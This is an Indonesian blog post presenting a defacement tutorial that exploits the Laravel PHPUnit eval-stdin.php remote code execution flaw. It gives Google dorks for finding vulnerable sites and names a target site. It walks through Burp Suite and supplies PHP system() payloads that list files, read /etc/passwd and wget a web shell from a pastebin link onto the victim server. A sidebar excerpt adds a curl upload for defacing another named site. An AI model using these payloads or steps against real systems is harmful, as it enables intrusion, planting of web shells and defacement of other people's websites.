Skip to main content

Tutorial deface POC Laravel phpUnit UPLOAD SHELL

Tutorial deface POC Laravel phpUnit UPLOAD SHELV


Setelah sekian lama kami tidak update seputar deface kali ini kami akan berbagi tutorial tentang Laravel phpUnit UPLOAD SHELL.

       Teknik yang satu ini memanfaatkan sebuah bug dari Fitur yang di sediakan oleh pengguna laravel yaitu php unit dengan cara menggunakan remote code execution (RCE)

Tutorial / Cara Upload Shell Metode Laravel phpUnit to RCE( Remote Code Execution ) dengan BurpSuite
Pertama siapkan :
- BurpSuite ( download di google banyak )
- Browser

Dorking di google :
- inurl:vendor/phpunit/phpunit/src/
- inurl:/src/Util/PHP/ intitle:index of
- inurl:/Util/PHP/ "eval-stdin.php"
* kembangin lagi biar dapet target lebih fresh

Exploit : /eval-stdin.php
site.co.li/vendor/phpunit/phpunit/src/Util/PHP/eval.stdin.php
* kalau blank putih berarti vuln
Oke langsung aja, disini gua udh dapet targetnya :
http://www.olapcemetery.com//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Buka BurpSuite > ke menu Proxy > pilih Intercept > nyalakan Intercept ( Intercept On )
Lalu kalian buka target yang tadi, dan buka BurpSuite lagi.

Jika sudah, klik kanan dan pilih Send to Repeater / Ctrl + R
Masuk ke Repeater, lihat kolom kiri adalah requestnya dan responsnya berada di sebelah kanan.
Nah sekarang saatnya mengeksekusi :v
Masukkan payload <?php system('ls');?> di kolom request, gunanya agar melihat isi dalam dir /PHP/ atau bisa juga dengan <?php system('tail /etc/passwd');?> untuk melihat isi dari /etc/passwd nya, terus klik " Go ".

Nanti kalo bisa di eksekusi bakal muncul responsnya disebelah kanan, lihat gambar.
Kalo gamuncul berarti gbs di eksekusi.

Langsung aja kita tusbool gan dgn perintah wget buat manggil shell kita

- <?php system('wget link shell lu -o px.php'); ?>
     atau lu bisa pake link shell gua
- <?php system('wget https://pastebin.com/raw/E5fXkdyC -o px.php'); ?>
Nb : px.php bisa ganti terserah kamu, buat namain file shell yg kita upload
Nah shell px.php gua udh ke upload, tinggal buka aja deh :*
Shell telah terupload :V


Comments

Post a Comment

Popular posts from this blog

Cara deface poc webdav di termux

HELLO ALL ^_^ KAMI AKAN MENSHARE CARA DEFACE DENGAN TERMUX Bahan bahan -dork vuln -termux (ada di playstore) Cara untuk pasang curl -apt upgrade -apt update -pkg install curl Pindahkan script kalian di penyimpanan internal dan jangan di folder letak kan di luar Sesudah itu lalu ketikan Liat target nya home nya di index.html atau di index.htm Cara nya tinggal nambah di belakang url www.target.co.za menjadi www.target.co.za/index.html atau /index.htm Lalu ketikan curl -T /storage/emulated/0/index.html TARGET Contoh:curl -T /storage/emulated/0/index.html www.nicestuff.co.za
Post a Comment
Read more

6 Serangan Hacker Terhebat Di Dunia

Perkembangan dunia internet yang semakin pesat dan sangat dibutuhkan pada saat ini, memiliki dampak yang memunculkan para jenius teknologi mengembangkan serangan dunia maya atau Cyber Attack. Serangan melalui dunia maya ini makin dikenal masyarakat awam ketika marak munculnya jenis serangan Wanna Cry yang melibatkan perusahaan besar di dunia sebagai korban pemerasan. Pengertian Serangan Cyber Serangan cyber adalah eksploitasi yang disengaja terhadap sistem komputer. Serangan ini biasanya ditujukan pada perusahaan besar yang bergantung pada teknologi dan jaringan. Serangan ini menggunakan kode yang dapat mengubah kode komputer, logika atau data yang mengakibatkan konsekuensi yang mengganggu serta membahayakan data. Serangan cyber ini disebut juga serangan pencurian data, informasi dan identitas, karena tujuan para penyerang adalah menukarkan data dengan sejumlah uang. Serangan cyber dipecah menjadi dua jenis besar tergantung pada tujuan penyerang. Pertama adalah ...
Post a Comment
Read more